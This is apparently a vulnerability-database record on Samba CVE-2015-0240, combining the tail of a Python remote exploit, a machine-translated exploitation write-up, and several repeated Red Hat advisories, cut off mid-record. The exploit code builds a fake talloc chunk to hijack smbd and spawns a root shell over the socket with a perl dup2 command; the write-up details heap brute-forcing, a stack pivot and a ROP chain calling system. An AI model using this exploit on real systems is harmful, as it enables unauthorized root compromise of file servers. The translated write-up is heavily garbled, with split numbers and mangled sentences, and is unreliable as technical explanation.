4280:\r\n dump_call = True\r\n break\r\n print(' [-] dump_mem_call_addr failed. try again')\r\n force_dce_disconnect()\r\n if not dump_call:\r\n print(' [-] dump smbd failed')\r\n return False\r\n \r\n print(' [+] dump success. getting smbd ...')\r\n # first time, remove any data before \\7fELF\r\n mem = mem[mem.index('\\x7fELF'):]\r\n \r\n mem, pos = recv_till_string(mem, '\\x00__gmon_start__\\x00')\r\n print(' [*] found __gmon_start__ at {:x}'.format(pos+1))\r\n \r\n pos = mem.rfind('\\x00\\x00', 0, pos-1)\r\n dynstr_offset = pos+1\r\n print(' [*] found .dynstr section at {:x}'.format(dynstr_offset))\r\n \r\n dynstr = mem[dynstr_offset:]\r\n mem = mem[:dynstr_offset]\r\n \r\n # find start of .dynsym section\r\n pos = len(mem) - 16\r\n while pos > 0:\r\n if mem[pos:pos+16] == '\\x00'*16:\r\n break\r\n pos -= 16 # sym entry size is 16 bytes\r\n if pos <= 0:\r\n print(' [-] found wrong .dynsym section at {:x}'.format(pos))\r\n return None\r\n dynsym_offset = pos\r\n print(' [*] found .dynsym section at {:x}'.format(dynsym_offset))\r\n dynsym = mem[dynsym_offset:]\r\n \r\n # find sock_exec\r\n dynstr, pos = recv_till_string(dynstr, '\\x00sock_exec\\x00')\r\n print(' [*] found sock_exec string at {:x}'.format(pos+1))\r\n sock_exec_offset = lookup_dynsym(dynsym, pos+1)\r\n print(' [*] sock_exec offset {:x}'.format(sock_exec_offset))\r\n \r\n #info['mem'] = mem # smbd data before .dynsym section\r\n info['dynsym'] = dynsym\r\n info['dynstr'] = dynstr # incomplete section\r\n info['sock_exec_addr'] = info['smbd_addr']+sock_exec_offset\r\n print(' [+] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n \r\n # Note: can continuing memory dump to find ROP\r\n \r\n force_dce_disconnect()\r\n \r\n########\r\n# code execution\r\n########\r\ndef call_sock_exec(info):\r\n prefix_len = addr2utf_prefix(info['sock_exec_addr'])\r\n if prefix_len == 3:\r\n return False # too bad... cannot call\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n fake_talloc_chunk_exec = pack(\"<IIIIIIIIIIII\",\r\n 0, 0, # next, prev\r\n 0, 0, # parent, child\r\n 0, # refs\r\n info['sock_exec_addr'], # destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n chunk = '\\x00'*prefix_len+fake_talloc_chunk_exec + info['cmd'] + '\\x00'\r\n set_payload(chunk, TARGET_PAYLOAD_SIZE)\r\n for i in range(3):\r\n if request_check_valid_addr(info['payload_addr']+TALLOC_HDR_SIZE+prefix_len):\r\n print('waiting for shell :)')\r\n return True\r\n print('something wrong :(')\r\n return False\r\n \r\n########\r\n# start work\r\n########\r\n \r\ndef check_exploitable():\r\n if request_check_valid_addr(0x41414141):\r\n print('[-] seems not vulnerable')\r\n return False\r\n if request_check_valid_addr(0):\r\n print('[+] seems exploitable :)')\r\n return True\r\n \r\n print(\"[-] seems vulnerable but I cannot exploit\")\r\n print(\"[-] I can exploit only if 'creds' is controlled by 'ReferentId'\")\r\n return False\r\n \r\ndef do_work(args):\r\n info = {}\r\n \r\n if not (args.payload_addr or args.heap_start or args.start_payload_size):\r\n if not check_exploitable():\r\n return\r\n \r\n start_size = 512*1024 # default size with 512KB\r\n if args.payload_addr:\r\n info['payload_addr'] = args.payload_addr\r\n else:\r\n heap_start = args.heap_start if args.heap_start else 0xb9800000+0x30000\r\n if args.start_payload_size:\r\n start_size = args.start_payload_size * 1024\r\n if start_size < TARGET_PAYLOAD_SIZE:\r\n start_size = 512*1024 # back to default\r\n info['payload_addr'] = find_payload_addr(heap_start, start_size, TARGET_PAYLOAD_SIZE)\r\n \r\n # the real talloc chunk address that stored the raw netlogon data\r\n # serverHandle 0x10 bytes. accountName 0xc bytes\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n \r\n while not leak_info_find_offset(info):\r\n # Note: do heap bruteforcing again seems to be more effective\r\n # start from payload_addr + some offset\r\n print(\"[+] bruteforcing heap again. start from {:x}\".format(info['payload_addr']+0x10000))\r\n info['payload_addr'] = find_payload_addr(info['payload_addr']+0x10000, start_size, TARGET_PAYLOAD_SIZE)\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n \r\n got_fd = leak_sock_fd(info)\r\n \r\n # create shell command for reuse sock fd\r\n cmd = \"perl -e 'use POSIX qw(dup2);$)=0;$>=0;\" # seteuid, setegid\r\n cmd += \"dup2({0:d},0);dup2({0:d},1);dup2({0:d},2);\".format(info['sock_fd']) # dup sock\r\n # have to kill grand-grand-parent process because sock_exec() does fork() then system()\r\n # the smbd process still receiving data from socket\r\n cmd += \"$z=getppid;$y=`ps -o ppid= $z`;$x=`ps -o ppid= $y`;kill 15,$x,$y,$z;\" # kill parents\r\n cmd += \"\"\"print \"shell ready\\n\";exec \"/bin/sh\";'\"\"\" # spawn shell\r\n info['cmd'] = cmd\r\n \r\n # Note: cannot use system@plt because binary is PIE and chunk dtor is called in libtalloc.\r\n # the ebx is not correct for resolving the system address\r\n smbd_info = {\r\n 0x5dd: { 'uint8t_offset': 0x711555, 'talloc_pop': 0x41a890, 'sock_exec': 0x0044a060, 'version': '3.6.3-2ubuntu2 - 3.6.3-2ubuntu2.3'},\r\n 0xb7d: { 'uint8t_offset': 0x711b7d, 'talloc_pop': 0x41ab80, 'sock_exec': 0x0044a380, 'version': '3.6.3-2ubuntu2.9'},\r\n 0xf7d: { 'uint8t_offset': 0x710f7d, 'talloc_pop': 0x419f80, 'sock_exec': 0x00449770, 'version': '3.6.3-2ubuntu2.11'},\r\n 0xf1d: { 'uint8t_offset': 0x71ff1d, 'talloc_pop': 0x429e80, 'sock_exec': 0x004614b0, 'version': '3.6.6-6+deb7u4'},\r\n }\r\n \r\n leak_talloc_pop_addr(info) # to double check the bininfo\r\n bininfo = smbd_info.get(info['uint8t_addr'] & 0xfff)\r\n if bininfo is not None:\r\n smbd_addr = info['uint8t_addr'] - bininfo['uint8t_offset']\r\n if smbd_addr + bininfo['talloc_pop'] == info['talloc_pop_addr']:\r\n # correct info\r\n print('[+] detect smbd version: {:s}'.format(bininfo['version']))\r\n info['smbd_addr'] = smbd_addr\r\n info['sock_exec_addr'] = smbd_addr + bininfo['sock_exec']\r\n print(' [*] smbd loaded addr: {:x}'.format(smbd_addr))\r\n print(' [*] use sock_exec offset: {:x}'.format(bininfo['sock_exec']))\r\n print(' [*] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n else:\r\n # wrong info\r\n bininfo = None\r\n \r\n got_shell = False\r\n if bininfo is None:\r\n # no target binary info. do a hard way to find them.\r\n \"\"\"\r\n leak smbd_server_connection_handler for 2 purposes\r\n - to check if compiler does code alignment\r\n - to estimate smbd loaded address\r\n - gcc always puts smbd_server_connection_handler() function at\r\n beginning area of .text section\r\n - so the difference of smbd_server_connection_handler() offset is\r\n very low for all smbd binary (compiled by gcc)\r\n \"\"\" \r\n leak_smbd_server_connection_handler_addr(info)\r\n find_smbd_base_addr(info)\r\n dump_smbd_find_bininfo(info)\r\n \r\n # code execution\r\n if 'sock_exec_addr' in info and call_sock_exec(info):\r\n s = get_socket()\r\n print(s.recv(4096)) # wait for 'shell ready' message\r\n s.send('uname -a\\n')\r\n print(s.recv(4096))\r\n s.send('id\\n')\r\n print(s.recv(4096))\r\n s.send('exit\\n')\r\n s.close()\r\n \r\n \r\ndef hex_int(x):\r\n return int(x,16)\r\n \r\n# command arguments\r\nparser = argparse.ArgumentParser(description='Samba CVE-2015-0240 exploit')\r\nparser.add_argument('target', help='target IP address')\r\nparser.add_argument('-hs', '--heap_start', type=hex_int,\r\n help='heap address in hex to start bruteforcing')\r\nparser.add_argument('-pa', '--payload_addr', type=hex_int, \r\n help='exact payload (accountName) address in heap. If this is defined, no heap bruteforcing')\r\nparser.add_argument('-sps', '--start_payload_size', type=int,\r\n help='start payload size for bruteforcing heap address in KB. (128, 256, 512, ...)')\r\n \r\nargs = parser.parse_args()\r\nrequester.set_target(args.target)\r\n \r\n \r\ntry:\r\n do_work(args)\r\nexcept KeyboardInterrupt:\r\n pass\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89724", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2016-10-28T18:45:46", "bulletinFamily": "info", "description": "## 1 demo\n\n## [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h2_ \u80cc\u666f>)2 background\n\n2 0 1 5 year 2 Month 2 3 day, the Red Hat product security team released a Samba service end of the smbd vulnerability announcement [1], the vulnerability number is[CVE-2 0 1 5-0 2 4 0](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0240>), almost affect all versions. The vulnerability trigger is not needed by the Samba server account authentication, and the smbd service end is usually to run with root privileges, if the vulnerability can be used to achieve arbitrary code execution, an attacker can remotely obtain system root privileges, the harm is extremely serious, and therefore the vulnerability of CVSS score also reached the 1 to 0.\n\nThe vulnerability of the basic principle is to stack on the uninitialized pointer is passed in TALLOC_FREE()function. Want to take advantage of this vulnerability, you first need to control on the stack uninitialized data, this and the compilation the generated binary file stack layout related. So few foreign security researchers for different Linux distributions the binary file to do the analysis, wherein the Worawit Wang([@sleepya_](<https://twitter.com/sleepya/_>))gives better results, he confirmed on Ubuntu 12.04 x86 (Samba 3.6.3)and Debian 7 x86 (Samba 3.6.6), this vulnerability can be used to achieve remote code arbitrary execution, reference [2] in the comments. After England established the security company NCC Group of researchers shows exploit the idea of [4], but also not to use details and exploit code. Herein a detailed analysis and to achieve a Ubuntu 12.04 x86\uff08Debian 7 x86 case is similar to the platform under the Samba service end of the remote code that any execution of exploit it.\n\n## [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h3_ \u6f0f\u6d1e \u7b80\u4ecb>)3 vulnerability profile\n\nThere have been many articles shows vulnerability analysis [3], here only do a brief introduction. The vulnerability occurs in a function _netr_ServerPasswordSet (), local variable creds was originally desired by netr_creds_server_step_check() function to initialize, but if the structure of the input such that the netr_creds_server_step_check() fails, it can lead to creds is not initialized were introduced in the TALLOC_FREE()function:\n\n\nNTSTATUS _netr_ServerPasswordSet(struct pipes_struct *p, struct netr_ServerPasswordSet *r)\n{\nNTSTATUS status = NT_STATUS_OK; int i; struct netlogon_creds_CredentialState *creds;\n[...]\nstatus = netr_creds_server_step_check(p, p->mem_ctx, r->in. computer_name, r->in. credential, r->out. return_authenticator, &creds);\nunbecome_root(); if (! NT_STATUS_IS_OK(status)) {\n[...]\nTALLOC_FREE(creds); return status;\n}\n\n## [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4_ \u6f0f\u6d1e \u5229\u7528>)4 exploit\n\nWe first look at the smbd binary which turned on what protection mechanisms:\n\n\n$ checksec.sh --file smbd\nRELRO STACK CANARY NX PIE RPATH RUNPATH FILE\nFull RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH smbd\n\nCompiler all be able to add protection mechanisms are used, the most attention is required on the PIE of protection, so if you want to use the binary itself code fragment to ROP or call the import function, you must first know the program itself to load the address.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.1_ \u4efb\u610f \u5730\u5740 free>)4.1 any address Free\n\nTo exploit this vulnerability, you first need to find a control flow, to be able to control on the stack not initialized the pointer creds, so that we can achieve arbitrary address to call TALLOC_FREE () on. According to@sleepya_ the PoC, we already know, in Ubuntu 12.04 and Debian 7 x86 system, NetrServerPasswordSet request among PrimaryName the ReferentID domain happens to fall in a stack on the uninitialized pointer creds position. So we can by constructing ReferentID to achieve any address Free. PoC code is as follows:\n\n\nprimaryName = nrpc. PLOGONSRV_HANDLE() # ReferentID field of PrimaryName controls the uninitialized value of creds in ubuntu 12.04 32bit primaryName. fields['ReferentID'] = 0x41414141 \n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.2_ \u63a7\u5236 eip>)4.2 control EIP\n\nWith any address Free, we can think of a way to let the TALLOC_FREE()to release our control of the memory block, but we do not know we can control the memory address of the DCERPC request of the data stored in the heap. We can brute-force the stack address, because the smbd process using the fork the way to handle each connection, the memory space of the layout is unchanged. In addition, we may be in a heap on a large number of arrangement of the TALLOC memory blocks, to improve the hit rate, as far as possible to reduce the enumeration space. We first assume that already know the heap address, first take a look at how to structure TALLOC memory block to hijack the EIP. We need to get to know TALLOC_FREE (). First take a look at the TALLOC memory blocks of the structure:\n\n\nstruct talloc_chunk { struct talloc_chunk *next, *prev; struct talloc_chunk *parent, *child; struct talloc_reference_handle *refs;\ntalloc_destructor_t destructor; const char *name;\nsize_t size; unsigned flags; void *pool; 8 bytes padding;\n};\n\nIn order to meet the 1 6-byte aligned, this structure at the end there are 8 bytes of padding, so that the talloc_chunk structure a total of 4 to 8 bytes. In this structure, the destructor is a function pointer, we can be of any configuration. First take a look at the TALLOC_FREE()this macro expands to the code:\n\n\n_PUBLIC_ int _talloc_free(void *ptr, const char *location)\n{ struct talloc_chunk *tc; if (unlikely(ptr == NULL)) { return -1;\n}\ntc = talloc_chunk_from_ptr(ptr);\n...\n}\n\n_talloc_free()and call the talloc_chunk_from_ptr (), this function is used to convert the memory pointer when the allocation is returned to the user using the pointer ptr into into the talloc_chunk pointer.\n\n\n/* panic if we get a bad magic value */ static inline struct talloc_chunk *talloc_chunk_from_ptr(const void *ptr)\n{ const char *pp = (const char *)ptr; struct talloc_chunk *tc = discard_const_p(struct talloc_chunk, pp - TC_HDR_SIZE); if (unlikely((tc->flags & (TALLOC_FLAG_FREE | ~0xF)) != TALLOC_MAGIC)) { if ((tc->flags & (~0xFFF)) == TALLOC_MAGIC_BASE) {\ntalloc_abort_magic(tc->flags & (~0xF)); return NULL;\n} if (tc->flags & TALLOC_FLAG_FREE) {\ntalloc_log(\"talloc: access after free error- first free may be at %s\\n\", tc->name);\ntalloc_abort_access_after_free(); return NULL;\n} else {\ntalloc_abort_unknown_value(); return NULL;\n}\n} return tc;\n}\n\nThis function simply takes the user memory pointer is subtracted TC_HDR_SIZE and return, TC_HDR_SIZE is talloc_chunk size 4 8, but we need to meet the tc->flags check, which is set to the correct Magic Number, otherwise the function cannot return the correct pointer. Next, we continue to see _talloc_free()function:\n\n\n_PUBLIC_ int _talloc_free(void *ptr, const char *location)\n{\n...\ntc = talloc_chunk_from_ptr(ptr); if (unlikely(tc->refs != NULL)) { struct talloc_reference_handle *h; if (talloc_parent(ptr) == null_context && tc->refs->next == NULL) { return talloc_unlink(null_context, ptr);\n}\ntalloc_log(\"ERROR: talloc_free with references at %s\\n\",\nlocation); for (h=tc->refs; h; h=h->next) {\ntalloc_log(\"\\treference at %s\\n\",\nh->location);\n} return -1;\n} return _talloc_free_internal(ptr, location);\n}\n\nIf tc->refs not equal to NULL, then enter the if branch: in order to get inside the first if branch is not linked, we need to put the tc->parent pointer is set to NULL; immediately after the for Loop and requires that we let tc->refs point to a legitimate list, there are some complex. We'll see if tc->refs for the NULL case, i.e. the program proceeds to a _talloc_free_internal()function:\n\n\nstatic inline int _talloc_free_internal(void *ptr, const char *location)\n{\n... if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) { /* we have a free loop - stop looping */ return 0;\n} if (unlikely(tc->destructor)) {\ntalloc_destructor_t d = tc->destructor; if (d == (talloc_destructor_t)-1) { return -1;\n}\ntc->destructor = (talloc_destructor_t)-1; if (d(ptr) == -1) { // call destructor tc->destructor = d; return -1;\n}\ntc->destructor = NULL;\n}\n...\n}\n\nWe omitted the function has no need to consider part in the above function, we have seen talloc_chunk the destructor to be called up, but before that there are some checks: first if, we can not be in the flags set in the TALLOC_FLAG_LOOP; in the second if, the destructor if set to -1, the function returns -1, the program will not crash if the destructor is set to another illegal address, then the program will crash and exit. We can use this feature to verify the exhaustive heap address is accurate: we are in the exhaustive when the destructor is set to-1, When you find one to TALLOC_FREE()the address does not let the program crash requests have returned, then the destructor is set to an illegal address, if the program at this time to crash, then we find that the address is correct. Now we summarize what we need to construct the chunk should satisfy the conditions:\n\n\nstruct talloc_chunk { struct talloc_chunk *next, *prev; // no request struct talloc_chunk *parent, *child; // no request struct talloc_reference_handle *refs; // refs = 0 talloc_destructor_t destructor; // destructor = -1: (No Crash), others: is controled EIP const char *name;\nsize_t size; unsigned flags; // Condition 1: flags & (TALLOC_FLAG_FREE | ~0xF)) == TALLOC_MAGIC // condition 2: tc->flags & TALLOC_FLAG_LOOP == False void *pool; // not required 8 bytes padding; // not required };\n\nSo far, we already know how through the structure of the chunk passed to the TALLOC_FREE()to control the EIP.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.3_ \u7a77 \u4e3e \u5806 \u5730\u5740>)4.3 exhaustive heap address\n\nAfter modifying the PoC and combined with the gdb debugging found that, we can use the new password to construct a large number of the chunk corresponding to the PoC in the uasNewPass['Data'] is. Although sent to the Samba of the request which have a lot of data stored in the heap, among such as username and password, refer to [2], but much of the data required to comply with WSTR encoding, can not be passed to any character. In order to improve the exhaustive heap address of the efficiency, we use [4] proposed the idea of using only contains the refs, a destructor, name, size, flags this the 5 domain of the compressed chunk, from 4 to 8 bytes reduced to 2 0 Byte, so in our exhaustive only when the need for each address of the exhaustive 5 offset instead of the original 1 2. Compressing the chunk of the injection and the actual talloc_chunk structure of the corresponding relationship as shown below.\n\n! [image](/Article/UploadPic/2015-4/2 0 1 5 4 1 4 1 2 2 8 7 3 7 4. png)\n\nchunk injection quantity will also affect to the exhaustive efficiency. If the in-memory injection of the chunk more, you'll need to enumerate the space will be reduced, but each enumeration the network transport, the program of the input processing and the like factors of the resulting time overhead also increases, so the need according to the actual situation to select a compromise value. In addition, in our implementation of the exploit, the use of a process pool to achieve parallel enumeration, improved exhaustive efficiency.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.4_rop>)4.4 ROP\n\nTo achieve the ROP, we also need to enumerate the Samba program loads the base address. Due to the address randomization protection mechanisms of the minimum granularity of memory page, so we press the pages to enumerate can 0x1000 bytes. We in the platform, a large number of test address space may range, roughly 0x200 kinds of possible scenarios can be accepted. Now we can only be configured through the destructor to control once the EIP, in order to achieve the ROP, you first need to do stack migration stack pivot we in the samba binary is found in the following gadget: a\n\n\n0x000a6d7c: lea esp, dword [ecx-0x04] ; ret ; \n\nSince the control of the EIP site, the ecx-0x4 just point to the chunk name field, so we can see from the name field to start ROP. By setting a pop4ret pop eax ; pop esi ; pop edi ; pop ebp ; ret; the gadget, you can make esp point to the next compressed chunk in the name field, followed down, until ESP came up to us ejection of the memory at the end, where we can have unlimited write ROP Payload in.\n\n[4] did not give a specific stack migration of the gadget, but according to the text given in the figure shown, it can be speculated that the NCC Group of researchers using the same gadget is.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.5_ \u4efb\u610f \u4ee3\u7801 \u6267\u884c>)4.5 arbitrary code execution\n\nPay attention to the smbd program to import the system function, therefore we can directly call the system of the PLT address to execute arbitrary commands. But how to a write command, if used in the stack is arranged in the command, currently we only know the compression of the chunk address, but of which only 4 bytes are available, so consider the call to snprintf, to the bss section in the byte-by-byte write command, this way you can perform arbitrary-length command. Note that, in the call to snprintf and system, byTo binary using address-independent code, PIC, and need to put the GOT table address is restored to the ebx register. Generate a ROP Payload of the Python code is as follows:\n\n\n# ebx => got rop = l32(popebx) + l32(got) # write cmd to bss, fmt == \"%c\" for i in xrange(len(cmd)):\nc = cmd[i]\nrop += l32(snprintf) + l32(pop4ret)\nrop += l32(bss + i) + l32(2) + l32(fmt) + l32(ord(c)) # system(cmd) rop += l32(system) + 'leet' + l32(bss)\n\n[4] The method used is a conventional mmap() + memcpy()and then execute shellcode the way, you can achieve the same effect.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.6_exploit \u5b8c\u6574 \u4ee3\u7801>)4.6 exploit the full code\n\n[samba-exploit.py](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/samba-exploit.py>)\n\n## [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h5_ \u53c2\u8003\u8d44\u6599>)5 references\n\n1. [Samba vulnerability (CVE-2 0 1 5-0 2 4 0)](<https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/?spm=0.0.0.0.e8Vbd3>)\n2. [PoC for Samba vulnerabilty (CVE-2 0 1 5-0 2 4 0)](<https://gist.github.com/worawit/33cc5534cb555a0b710b>)\n3. [Samba _netr_ServerPasswordSet Expoitability Analysis](<https://www.nccgroup.trust/en/blog/2015/03/samba-_netr_serverpasswordset-expoitability-analysis/>)\n4. [Exploiting Samba CVE-2 0 1 5-0 2 4 0 on Ubuntu 12.04 and Debian 7 3 2-bit](<https://www.nccgroup.trust/en/blog/2015/03/exploiting-samba-cve-2015-0240-on-ubuntu-1204-and-debian-7-32-bit/>)\n\n", "modified": "2015-04-14T00:00:00", "published": "2015-04-14T00:00:00", "id": "MYHACK58:62201561147", "href": "http://www.myhack58.com/Article/html/3/62/2015/61147.htm", "type": "myhack58", "title": "Samba CVE-2 0 1 5-0 2 4 0 remote code execution exploit practice-vulnerability warning-the black bar safety net", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:46:17", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2017-09-08T12:07:16", "published": "2015-02-23T05:00:00", "id": "RHSA-2015:0249", "href": "https://access.redhat.com/errata/RHSA-2015:0249", "type": "redhat", "title": "(RHSA-2015:0249) Critical: samba3x security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:36", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2018-06-06T20:24:26", "published": "2015-02-23T05:00:00", "id": "RHSA-2015:0250", "href": "https://access.redhat.com/errata/RHSA-2015:0250", "type": "redhat", "title": "(RHSA-2015:0250) Critical: samba4 security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:28", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2018-04-12T03:33:22", "published": "2015-02-23T05:00:00", "id": "RHSA-2015:0252", "href": "https://access.redhat.com/errata/RHSA-2015:0252", "type": "redhat", "title": "(RHSA-2015:0252) Important: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:17", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2018-06-06T20:24:37", "published": "2015-02-23T05:00:00", "id": "RHSA-2015:0251", "href": "https://access.redhat.com/errata/RHSA-2015:0251", "type": "redhat", "title": "(RHSA-2015:0251) Critical: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:34", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2016-09-04T02:14:30", "published": "2015-02-23T05:00:00", "id": "RHSA-2015:0254", "href": "https://access.redhat.com/errata/RHSA-2015:0254", "type": "redhat", "title": "(RHSA-2015:0254) Critical: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:46", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2017-09-08T11:53:27", "published": "2015-02-23T05:00:00", "id": "RHSA-2015:0253", "href": "https://access.redhat.com/errata/RHSA-2015:0253", "type": "redhat", "title": "(RHSA-2015:0253) Critical: samba3x security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:24", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.", "modified": "2018-06-13T01:28:21", "published": "2015-02-23T16:36:13", "id": "RHSA-2015:0256", "href": "https://access.redhat.com/errata/RHSA-2015:0256", "type": "redhat", "title": "(RHSA-2015:0256) Critical: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:21", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System 